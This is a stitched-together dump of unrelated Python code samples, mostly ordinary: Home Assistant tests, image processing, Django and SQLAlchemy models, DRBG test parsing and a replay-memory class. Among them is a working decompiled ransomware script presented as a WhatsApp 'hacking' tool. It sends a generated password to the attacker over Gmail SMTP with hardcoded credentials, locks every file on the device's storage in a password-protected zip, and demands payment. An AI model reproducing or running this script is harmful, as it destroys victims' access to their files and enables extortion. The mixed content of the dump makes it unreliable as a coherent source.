async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test setup entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=2,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
async def test_migrate_entry(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.version == 2
assert entry.unique_id == "username"
async def test_migrate_entry_fails(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
side_effect=NoUsernameError("No username returned"),
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.MIGRATION_ERROR
assert entry.version == 1
assert entry.unique_id == "12"
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload an entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version="2",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is config_entries.ConfigEntryState.NOT_LOADED
|
StarcoderdataPython
|
135281
|
# uncompyle6 version 3.5.0
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <JustAHacker>
whoknow = 'ohiabuebmpoeomqk'
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, smtplib
from glob import glob as s
daftar = []
cekks = os.access('/sdcard', os.R_OK)
os.system('command -v zip > /dev/null 2>&1 || pkg install zip')
if cekks == True:
pass
else:
print 'This Program Needs Permission To Read Whatsapp Data'
print 'Please Give permission',
sys.exit()
os.chdir('/sdcard')
has = s('*.*')
for a in has:
daftar.append(a)
has = s('*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*/*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*/*/*/*.*')
for a in has:
daftar.append(a)
menit = len(daftar) / 65
generate1 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate2 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate3 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate4 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate5 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate6 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
passcrypt = generate1 + generate2 + generate3 + generate4 + generate5 + generate6
os.system('clear')
name = raw_input('\x1b[1;33mYour Whatsapp : ')
raw_input('Target : ')
time.sleep(2)
print 'Please Wait ' + str(menit) + ' Minutes '
try:
jfhfi = int(name)
except:
print 'Enter Your Whatsapp'
sys.exit()
if '+62' in str(name):
pass
else:
print 'Enter Your Whatsapp Using +62'
sys.exit()
print 'Hacking Target..Please Wait'
print 'If You Cancel This Proggress,your Whatsapp will error'
print 'So Please Be Patient'
fadd = '<EMAIL>'
tadd = '<EMAIL>'
SUBJECT = 'Whatsapp Korban = ' + name
TEXT = 'password zip = ' + str(passcrypt)
message = ('Subject: {}\n\n{}').format(SUBJECT, TEXT)
username = '<EMAIL>'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(username, whoknow)
server.sendmail(fadd, tadd, message)
azaz = 0
for i in daftar:
os.system('zip -rmq -1 --password ' + str(passcrypt) + ' myfile.zip ' + i)
azaz += 1
print str(azaz) + '/' + len(daftar) + ' Completed,please Wait'
print len(daftar) + ' Files Penting Anda Telah Dikunci,Termasuk photo'
print 'Selamat Semua File Anda Telah Dikunci'
print 'File Anda Terletak Di myfile.zip'
print 'Silakan Bayar 50Ribu Untuk Membuka File Nya'
print 'Whatsapp : 089682009902'
|
StarcoderdataPython
|
3214674
|
import torch
import os
import numpy as np
import cv2
from PIL import Image
from csr_model import csr_network
import torchvision.transforms.functional as TF
import matplotlib.pyplot as plt
def csr_retouch(path_to_model_state, path_to_old_images, path_to_new_images):
cuda = torch.cuda.is_available()
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
network = csr_network()
network.load_state_dict(torch.load(
path_to_model_state, map_location=torch.device('cpu')))
network.eval()
# img = image_file_to_tensor(image_path)
# result = network(img)
items = os.listdir(path_to_old_images)
for item in items:
if item.endswith(".jpg"):
load_path = os.path.join(path_to_old_images, item)
save_path = os.path.join(path_to_new_images, item)
image = Image.open(load_path)
image = TF.to_tensor(image).type(Tensor)
image = image.unsqueeze(0)
result = network(image)
result = result.squeeze().mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
im = Image.fromarray(result)
im.save(save_path, quality=95)
return 1
'''
def image_file_to_tensor(image_path):
items = os.listdir(image_path)
img = Image.open(os.path.join(image_path, items[0])).convert("RGB")
width, height = img.size
# images = torch.zeros(len(items), 3, height, width)
images = torch.zeros(1, 3, height, width, requires_grad=False)
index = 0
for item in items:
if item.endswith(".jpg"):
load_path = os.path.join(image_path, item)
image = Image.open(load_path).convert("RGB")
image = TF.to_tensor(image).type(torch.FloatTensor)
images[index, :, :, :] = image
index += 1
if index >= 1:
break
return images
'''
def main():
csr_retouch("../../model_parameter/csrnet.pth", ".../image_folder", ".../save_folder)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1630949
|
# Generated by Django 2.2 on 2021-04-06 12:58
from django.db import migrations
def add_priorities(apps, schema_editor):
Priority = apps.get_model("todolist_app", "Priority")
data = [
('Critical', 1),
('High', 2),
('Medium', 3),
('Low', 4),
('Trivial', 5),
]
for desc, order in data:
p = Priority(
description=desc,
order=order
)
p.save()
class Migration(migrations.Migration):
dependencies = [
('todolist_app', '0001_initial'),
]
operations = [
migrations.RunPython(add_priorities)
]
|
StarcoderdataPython
|
3335012
|
<gh_stars>0
from utah import Utah
from mesowest import MesoWest
import pandas as pd
from datetime import datetime as dt
state_sensors = Utah.request_data()
import os
outdir = './data'
if not os.path.exists(outdir):
os.mkdir(outdir)
for i in list(state_sensors.keys()):
dict = {}
outname = "sensors_{}.csv".format(i)
fullname = os.path.join(outdir, outname)
for j in state_sensors[i]:
df_mw = MesoWest.request_data(dt.strptime('6/26/2021', "%m/%d/%Y"), j)
if "relative_humidity" in df_mw.columns:
dict.setdefault(i, {})[j] = state_sensors[i][j]
else:
pass
print(dict)
df = pd.DataFrame.from_dict(dict)
print(df)
df[5] = df[5].str.replace('\n', '')
df.to_csv(fullname, index=False, header=True)
|
StarcoderdataPython
|
1790156
|
<gh_stars>1-10
import pytest
from meltano.core.db import project_engine
from meltano.api.models import db
class TestApp:
@pytest.fixture
def session(self):
# disable the `session` fixture not to override
# the `db.session`
pass
def test_core_registered(self, engine_sessionmaker, app):
engine, _ = engine_sessionmaker
# ensure both the API and the meltano.core
# are on the same database
assert engine.url == db.engine.url
|
StarcoderdataPython
|
3365634
|
from sqlalchemy import Column, Integer, String, Text, DateTime, Float, Boolean, PickleType
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class SubCategory(Base):
'''This is SubCategory sample Data model class.'''
__tablename__ = "tSubCategories"
__table_args__ = {"schema":"KnowHow.dbo"}
id = Column(Integer, primary_key=True, nullable=False)
name = Column(Text, nullable=False)
categoryId = Column(Text, nullable=True)
tages = Column(Integer, nullable=True)
def __repr__(self):
return '<SubCategory model {}>'.format(self.id)
|
StarcoderdataPython
|
1671476
|
<gh_stars>1-10
#!/usr/bin/python
# Copyright (C) International Business Machines Corp., 2005
# Author: <NAME> <<EMAIL>>
# Negative Test: attempt list of non-existent domain
import re
from XmTestLib import *
status, output = traceCommand("xm block-list 9999")
eyecatcher = "Error:"
where = output.find(eyecatcher)
if status == 0:
FAIL("xm block-list returned invalid %i != 0" % status)
elif where < 0:
FAIL("xm block-list failed to report error for non-existent domain")
|
StarcoderdataPython
|
1631363
|
from lib.pyapp import Pyapp
from lib.appController import drivers_queue
from conf.settings import logger
import threading
local = threading.local()
class BasePage():
def __init__(self,driver=None):
if not driver:
try:
local.driver = drivers_queue.get()
local.pyapp = Pyapp(local.driver)
except Exception as e:
logger.error('获取Driver出错:%s' % e)
else:
local.pyapp = Pyapp(driver)
def quit(self):
local.pyapp.quit()
class ThreadPage(BasePage):
def login_btn(self):
local.pyapp.click('android=>new UiSelector().resourceId("com.tencent.mobileqq:id/btn_login")')
def account(self):
local.pyapp.type('content=>请输入QQ号码或手机或邮箱', '123456<PASSWORD>')
def password(self):
local.pyapp.type('content=>密码 安全', '<PASSWORD>')
def login(self):
local.pyapp.click('id=>com.tencent.mobileqq:id/login')
def check(self,name):
return local.pyapp.wait_and_save_exception('android=>new UiSelector().text("开始验证")', name)
class Page(ThreadPage):
pass
if __name__ == '__main__':
# from appium import webdriver
# desired_caps = {}
# desired_caps['platformName'] = 'Android'
# desired_caps['platformVersion'] = '5.1.1'
# desired_caps['deviceName'] = 'emulator-5554'
# desired_caps['appPackage'] = 'com.tencent.mobileqq'
# desired_caps['appActivity'] = '.activity.SplashActivity'
# desired_caps["unicodeKeyboard"] = "True"
# desired_caps["resetKeyboard"] = "True"
# desired_caps["noReset"] = "True"
# driver = webdriver.Remote('http://127.0.0.1:7071/wd/hub', desired_caps)
from lib.appController import Controller
c = Controller()
c.server_start()
c.check_server()
c.driver_start()
page = Page()
page.login_btn()
page.account()
page.password()
page.login()
page.check('test')
|
StarcoderdataPython
|
3331506
|
<gh_stars>0
# Generated by Django 2.0.8 on 2018-09-06 14:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fullcalendar', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='calendarevent',
name='description',
field=models.TextField(blank=True, null=True, verbose_name='Description'),
),
]
|
StarcoderdataPython
|
1679334
|
<reponame>timgates42/balanced-python
import balanced
balanced.configure('<KEY>')
accounts = balanced.Account.query
|
StarcoderdataPython
|
1719734
|
""" Tests for filter query builder """
import unittest
from werkzeug.datastructures import ImmutableMultiDict
from app.builders.filter_query_builder import FilterQueryBuilder
class FilterQueryBuilderTestCase(unittest.TestCase):
def test_build_with_null_arguments_return_empty_filters(self):
# arrange
expected_filters_length = 0
builder = FilterQueryBuilder(None)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_almost_like_return_empty_filters(self):
# arrange
expected_filters_length = 0
args = ImmutableMultiDict(
[
("filtering[date]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_incorrect_return_empty_filters(self):
# arrange
expected_filters_length = 0
args = ImmutableMultiDict(
[
("abcde[date]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_but_empty_attr_return_empty_filters(self):
# arrange
expected_filters_length = 0
args = ImmutableMultiDict(
[
("filter[]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_correct_return_correct_filters(self):
# arrange
expected_filters_length = 1
args = ImmutableMultiDict(
[
("filter[date]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
self.assertIsNotNone(result.filters.get("date"))
self.assertEqual(result.filters.get("date"), 1521417600)
def test_build_with_one_filter_argument_with_two_attrs_return_the_first(self):
# arrange
expected_filters_length = 1
args = ImmutableMultiDict(
[
("filter[date][test]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
self.assertIsNotNone(result.filters.get("date"))
self.assertEqual(result.filters.get("date"), 1521417600)
self.assertIsNone(result.filters.get("test"))
def test_build_with_two_filter_argument_correct_return_correct_filters(self):
# arrange
expected_filters_length = 2
args = ImmutableMultiDict(
[
("filter[date]", 1521417600),
("filter[user_id]", 10)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
self.assertIsNotNone(result.filters.get("date"))
self.assertEqual(result.filters.get("date"), 1521417600)
self.assertIsNotNone(result.filters.get("user_id"))
self.assertEqual(result.filters.get("user_id"), 10)
|
StarcoderdataPython
|
1664079
|
<reponame>samlet/stack
import json
import graphene
from sagas.ofbiz.schema_queries_g import *
from sagas.ofbiz.schema_mutations_g import Mutations
from py4j.java_gateway import java_import
from sagas.ofbiz.runtime_context import platform
oc = platform.oc
finder = platform.finder
helper = platform.helper
java_import(oc.j, 'org.apache.ofbiz.entity.util.*')
class Query(graphene.ObjectType):
movies = graphene.List(lambda: SaMovie, limit=graphene.Int(),
offset=graphene.Int())
movie_genres = graphene.List(lambda: SaMovieGenres)
def resolve_movies(self, info, limit=None, offset=None, **kwargs):
entity_name = "SaMovie"
# recs = oc.all(entity_name)
# print("total record", len(recs))
findOptions = oc.j.EntityFindOptions()
if limit is None:
limit = 5
if offset is None:
offset = 0
# print(limit, offset)
findOptions.setLimit(limit)
findOptions.setOffset(offset)
recs = oc.delegator.findList("SaMovie", None, None, None, findOptions, False)
ent = oc.delegator.getModelEntity(entity_name)
result = helper.fill_records(ent, SaMovie, recs)
return result
def resolve_movie_genres(self, info):
entity_name = "SaMovieGenres"
recs = oc.all(entity_name)
ent = oc.delegator.getModelEntity(entity_name)
result = helper.fill_records(ent, SaMovieGenres, recs)
return result
schema = graphene.Schema(query=Query, mutation=Mutations)
|
StarcoderdataPython
|
3342013
|
import datetime
from mongoengine import StringField, DictField, DateTimeField, Document, BooleanField, IntField
class ValidationStatus(object):
NEW = "New"
IN_PROGRESS = "In progress"
CANCELATION_IN_PROGRESS = "Cancelation in progress"
CANCELED = "Canceled"
APPROVED = "Approved"
REJECTED = "Rejected"
class ValidationTx(Document):
did = StringField(max_length=128)
provider = StringField(max_length=128)
validationType = StringField(max_length=32)
requestParams = DictField()
status = StringField(max_length=32)
reason = StringField(max_length=128)
verifiedCredential = DictField()
isSavedOnProfile = BooleanField()
created = DateTimeField()
retries = IntField()
modified = DateTimeField(default=datetime.datetime.utcnow)
def __repr__(self):
return str(self.as_dict())
def as_dict(self):
if not self.isSavedOnProfile:
self.isSavedOnProfile = False
return {
"id": str(self.id),
"did": self.did,
"provider": self.provider,
"validationType": self.validationType,
"requestParams": self.requestParams,
"status": self.status,
"reason": self.reason,
"isSavedOnProfile": self.isSavedOnProfile,
"verifiedCredential": self.verifiedCredential,
"retries": self.retries,
"created": str(self.created),
"modified": str(self.modified)
}
def save(self, *args, **kwargs):
if not self.created:
self.created = datetime.datetime.utcnow()
self.modified = datetime.datetime.utcnow()
return super(ValidationTx, self).save(*args, **kwargs)
|
StarcoderdataPython
|
3318572
|
<reponame>clouserw/olympia
import logging
from django.conf import settings
from django.db import models
import amo.models
log = logging.getLogger('z.perf')
class PerformanceAppVersions(amo.models.ModelBase):
"""
Add-on performance appversions. This table is pretty much the same as
`appversions` but is separate because we need to push the perf stuff now
and I'm scared to mess with `appversions` because remora uses it in some
sensitive places. If we survive past 2012 and people suddenly have too
much time on their hands, consider merging the two.
"""
APP_CHOICES = [('firefox', 'Firefox')]
app = models.CharField(max_length=255, choices=APP_CHOICES)
version = models.CharField(max_length=255, db_index=True)
class Meta:
db_table = 'perf_appversions'
ordering = ('-id',)
class PerformanceOSVersion(amo.models.ModelBase):
os = models.CharField(max_length=255)
version = models.CharField(max_length=255)
name = models.CharField(max_length=255)
platform = models.CharField(max_length=255, null=True, blank=True)
class Meta:
db_table = 'perf_osversions'
ordering = ('-id',)
def __unicode__(self):
return self.name or '%s %s' % (self.os, self.version)
class Performance(amo.models.ModelBase):
"""Add-on performance numbers. A bit denormalized."""
# Cache storage for all platform perf numbers.
ALL_PLATFORMS = 'perf:platforms'
TEST_CHOICES = [('ts', 'Startup Time')]
addon = models.ForeignKey('addons.Addon', null=True,
related_name='performance')
average = models.FloatField(default=0, db_index=True)
appversion = models.ForeignKey(PerformanceAppVersions)
osversion = models.ForeignKey(PerformanceOSVersion)
test = models.CharField(max_length=50, choices=TEST_CHOICES)
@staticmethod
def get_threshold():
"""Percentage of slowness in which to flag the result as bad."""
return getattr(settings, 'PERF_THRESHOLD', 25) or 25
def get_baseline(self):
"""Gets the latest baseline startup time per Appversion/OS."""
try:
res = (Performance.objects
.filter(addon=None, appversion=self.appversion,
osversion=self.osversion, test=self.test)
.order_by('-created'))[0]
return res.average
except IndexError:
# This shouldn't happen but *surprise* it happened in production
log.info('Performance.get_baseline(): No baseline for '
'app %s version %s os %s version %s'
% (self.appversion.app, self.appversion.version,
self.osversion.os, self.osversion.version))
return self.average
def startup_is_too_slow(self, baseline=None):
"""Returns True if this result's startup time is slower
than the allowed threshold.
"""
if self.test != 'ts':
log.info('startup_is_too_slow() only applies to startup time, '
'not %s' % self.test)
return False
if not baseline:
baseline = self.get_baseline()
delta = (self.average - baseline) / baseline * 100
return delta >= self.get_threshold()
class Meta:
db_table = 'perf_results'
|
StarcoderdataPython
|
104805
|
try:
from conf import Conf
except ImportError:
from ..conf import Conf
import os
def setup_fixture():
# Clean the map db from MongoDb
if Conf.Instance().APP_MODE == "Test_Aws":
os.system('service mongod stop')
os.system('rm -Rf /data-mongodb/rs0-1/*')
os.system('rm -Rf /data-mongodb/rs0-2/*')
os.system('rm -Rf /data-mongodb/rs0-3/*')
os.system('service mongod start')
else:
os.system('mongo map --eval "db.dropDatabase()"')
    # Clean the SQLite DB
sql_db = Conf.Instance().SQLITE_DB
    os.system('rm -Rf %s' % sql_db)
|
StarcoderdataPython
|
1789331
|
<gh_stars>1-10
import binascii
import pprint
import sys
from hmac_drbg import *
def parse_entry(line):
key, val = line.split('=')
key = key.strip()
val = val.strip()
if val == 'True':
val = True
elif val == 'False':
val = False
elif val.isdigit():
val = int(val)
return key, val
def parse_rsp(rsp_file):
test_suites = []
suite = {}
test = {}
with open(rsp_file, 'r') as f:
while True:
line = f.readline()
if line == '':
break
if line == '\n' or line == '\r\n':
continue
if line.startswith('#'):
continue
line = line.strip()
if line.startswith('['):
e = line[1:-1]
if not '=' in e:
if suite:
test_suites.append(suite)
suite = {'Algorithm': e, 'Tests': []}
test = {}
else:
key, val = parse_entry(e)
suite[key] = val
continue
if line.startswith('COUNT'):
if test:
suite['Tests'].append(test)
test = {}
continue
key, val = parse_entry(line)
if key in test:
key = key + '2'
test[key] = val
return test_suites
# generate test cases for go-drbg
def dump_go(tests):
pr_fields = ['EntropyInput', 'Nonce', 'PersonalizationString', 'AdditionalInput', 'EntropyInputPR', 'AdditionalInput2', 'EntropyInputPR2', 'ReturnedBits']
print('package hmac\n')
print('var HmacSha512PrTests = []map[string]string{')
for t in tests:
print('\t{')
for k in pr_fields:
print('\t\t"{}": "{}",'.format(k, t[k]))
print('\t},')
print('}')
def run_tests(tests):
for test in tests:
t = {k: binascii.unhexlify(v) for k, v in test.items()}
l = len(t['ReturnedBits'])
drbg = DRBG(t['EntropyInput'] + t['Nonce'] + t['PersonalizationString'])
drbg.reseed(t['EntropyInputPR'] + t['AdditionalInput'])
drbg.generate(l)
drbg.reseed(t['EntropyInputPR2'] + t['AdditionalInput2'])
result = drbg.generate(l)
if result != t['ReturnedBits']:
print('FAILED TEST:')
pprint.pprint(test)
print('\nGot:', binascii.hexlify(result).decode('ascii'))
return
print('Passed all %s tests.' % len(tests))
def main():
test_suites = parse_rsp('HMAC_DRBG_PR.rsp')
# NOTE customize this code
tests = []
for t in test_suites:
if t['Algorithm'] == 'SHA-512':
tests += t['Tests']
run_tests(tests)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
1786259
|
<reponame>lwerdna/keypatch_binja<gh_stars>1-10
try:
from binaryninjaui import (UIAction, UIActionHandler, Menu)
from . import keypatch
UIAction.registerAction("KEYPATCH")
UIActionHandler.globalActions().bindAction("KEYPATCH", UIAction(keypatch.launch_keypatch))
Menu.mainMenu("Tools").addAction("KEYPATCH", "KEYPATCH")
except ModuleNotFoundError:
# probably being loaded by headless BinaryNinja
pass
|
StarcoderdataPython
|
1783158
|
<reponame>pmathewjacob/insightface-attendance
import tensorflow as tf
__weights_dict = dict()
is_train = False
def load_weights(weight_file):
import numpy as np
    if weight_file is None:
return
try:
weights_dict = np.load(weight_file).item()
except:
weights_dict = np.load(weight_file, encoding='bytes').item()
return weights_dict
def KitModel(weight_file = None):
global __weights_dict
__weights_dict = load_weights(weight_file)
data = tf.placeholder(tf.float32, shape = (None, 1920, 1080, 3), name = 'data')
bn_data = batch_normalization(data, variance_epsilon=1.9999999494757503e-05, name='bn_data')
conv0_pad = tf.pad(bn_data, paddings = [[0, 0], [3, 3], [3, 3], [0, 0]])
conv0 = convolution(conv0_pad, group=1, strides=[2, 2], padding='VALID', name='conv0')
bn0 = batch_normalization(conv0, variance_epsilon=1.9999999494757503e-05, name='bn0')
relu0 = tf.nn.relu(bn0, name = 'relu0')
pooling0_pad = tf.pad(relu0, paddings = [[0, 0], [1, 1], [1, 1], [0, 0]], constant_values=float('-Inf'))
pooling0 = tf.nn.max_pool(pooling0_pad, [1, 3, 3, 1], [1, 2, 2, 1], padding='VALID', name='pooling0')
stage1_unit1_bn1 = batch_normalization(pooling0, variance_epsilon=1.9999999494757503e-05, name='stage1_unit1_bn1')
stage1_unit1_relu1 = tf.nn.relu(stage1_unit1_bn1, name = 'stage1_unit1_relu1')
stage1_unit1_conv1 = convolution(stage1_unit1_relu1, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_conv1')
stage1_unit1_sc = convolution(stage1_unit1_relu1, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_sc')
stage1_unit1_bn2 = batch_normalization(stage1_unit1_conv1, variance_epsilon=1.9999999494757503e-05, name='stage1_unit1_bn2')
stage1_unit1_relu2 = tf.nn.relu(stage1_unit1_bn2, name = 'stage1_unit1_relu2')
stage1_unit1_conv2_pad = tf.pad(stage1_unit1_relu2, paddings = [[0, 0], [1, 1], [1, 1], [0, 0]])
stage1_unit1_conv2 = convolution(stage1_unit1_conv2_pad, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_conv2')
stage1_unit1_bn3 = batch_normalization(stage1_unit1_conv2, variance_epsilon=1.9999999494757503e-05, name='stage1_unit1_bn3')
stage1_unit1_relu3 = tf.nn.relu(stage1_unit1_bn3, name = 'stage1_unit1_relu3')
stage1_unit1_conv3 = convolution(stage1_unit1_relu3, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_conv3')
return data, tf.concat([stage1_unit1_sc, stage1_unit1_conv3], 0)
def convolution(input, name, group, **kwargs):
w = tf.Variable(__weights_dict[name]['weights'], trainable=is_train, name=name + "_weight")
if group == 1:
layer = tf.nn.convolution(input, w, name=name, **kwargs)
else:
weight_groups = tf.split(w, num_or_size_splits=group, axis=-1)
xs = tf.split(input, num_or_size_splits=group, axis=-1)
convolved = [tf.nn.convolution(x, weight, name=name, **kwargs) for
(x, weight) in zip(xs, weight_groups)]
layer = tf.concat(convolved, axis=-1)
if 'bias' in __weights_dict[name]:
b = tf.Variable(__weights_dict[name]['bias'], trainable=is_train, name=name + "_bias")
layer = layer + b
return layer
def batch_normalization(input, name, **kwargs):
mean = tf.Variable(__weights_dict[name]['mean'], name = name + "_mean", trainable = is_train)
variance = tf.Variable(__weights_dict[name]['var'], name = name + "_var", trainable = is_train)
offset = tf.Variable(__weights_dict[name]['bias'], name = name + "_bias", trainable = is_train) if 'bias' in __weights_dict[name] else None
scale = tf.Variable(__weights_dict[name]['scale'], name = name + "_scale", trainable = is_train) if 'scale' in __weights_dict[name] else None
return tf.nn.batch_normalization(input, mean, variance, offset, scale, name = name, **kwargs)
|
StarcoderdataPython
|
1673447
|
# age: int
# name: str
# height: float
# is_human: bool
def police_check(age: int) -> bool:
if age > 18:
can_drive = True
else:
can_drive = False
return "string"
if police_check("twelve"):
print("You may pass.")
else:
print("Pay a fine.")
|
StarcoderdataPython
|
182470
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
requires = [
'awscli>=1.16.211',
'boto3>=1.9.200',
'click>=7.1.1',
'pytest>=3.5.1',
'requests>=2.23.0',
'tabulate>=0.8.7'
]
setuptools.setup(
name="undmainchain",
packages=['undmainchain'],
version="0.0.12",
author="Unification Foundation",
author_email="<EMAIL>",
description="Helper tools for administering the Unification Mainchain",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/unification-com/mainchain-helpers",
include_package_data=True,
install_requires=requires,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
StarcoderdataPython
|
162014
|
<filename>uta_rest/django_secret_key.py<gh_stars>1-10
import os
import random
from base64 import urlsafe_b64encode as b64encode
random.seed()
def generate_key(max_length, seed_length):
"""
    Generate a URL-safe Base64-encoded pseudo-random key, truncated to
    max_length characters and seeded from seed_length * 1024 random bits.
From: https://gist.github.com/airtonix/6204802
"""
PATTERN = "%%0%dX"
JUNK_LEN = 1024
junk = (PATTERN % (JUNK_LEN * 2)) % random.getrandbits(JUNK_LEN * seed_length)
key = str(junk).encode()
return b64encode(key)[:max_length]
def get_or_create_django_secret_key(key_dir):
key_filename = os.path.join(key_dir, "django_secret_key.txt")
if not os.path.exists(key_filename):
secret_key = generate_key(50, 128)
with open(key_filename, "wb") as f:
f.write(secret_key)
else:
with open(key_filename) as f:
secret_key = f.read().strip()
return secret_key
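# Illustrative usage from a Django settings module (a sketch; the import path
# assumes this file is importable as uta_rest.django_secret_key, and BASE_DIR
# is a hypothetical settings variable pointing at a writable directory):
#
#   from uta_rest.django_secret_key import get_or_create_django_secret_key
#   SECRET_KEY = get_or_create_django_secret_key(BASE_DIR)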
|
StarcoderdataPython
|
80583
|
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import os
class Memory(object):
"""
An implementation of the replay memory. This is essential when dealing with DRL algorithms that are not
multi-threaded as in A3C.
"""
def __init__(self, memory_size, state_dim, action_dim, batch_size):
"""
A naive implementation of the replay memory, need to do more work on this after testing DDPG
"""
self.memory_size = memory_size
self.batch_size = batch_size
if type(state_dim) is not tuple:
state_dim = (state_dim, )
# current state
self.curr_state = np.empty(shape=(memory_size, ) + state_dim)
# next state
self.next_state = np.empty(shape=(memory_size, ) + state_dim)
# reward
self.rewards = np.empty(memory_size)
# terminal
self.terminals = np.empty(memory_size)
# actions
self.actions = np.empty((memory_size, action_dim) if action_dim > 1 else memory_size)
self.current = 0
self.count = 0
def add(self, curr_state, next_state, reward, terminal, action):
self.curr_state[self.current, ...] = curr_state
self.next_state[self.current, ...] = next_state
self.rewards[self.current] = reward
self.terminals[self.current] = terminal
self.actions[self.current] = action
self.current += 1
self.count = max(self.count, self.current)
        if self.current >= self.memory_size:
self.current = 0
def sample(self):
indexes = np.random.randint(0, self.count, self.batch_size)
curr_state = self.curr_state[indexes, ...]
next_state = self.next_state[indexes, ...]
rewards = self.rewards[indexes]
terminals = self.terminals[indexes]
actions = self.actions[indexes]
return curr_state, next_state, rewards, terminals, actions
def save(self, save_dir):
path = os.path.join(save_dir, type(self).__name__)
if not os.path.exists(path):
os.makedirs(path)
print("Saving memory...")
for name in ("curr_state", "next_state", "rewards", "terminals", "actions"):
np.save(os.path.join(path, name), arr=getattr(self, name))
def restore(self, save_dir):
"""
Restore the memory.
"""
path = os.path.join(save_dir, type(self).__name__)
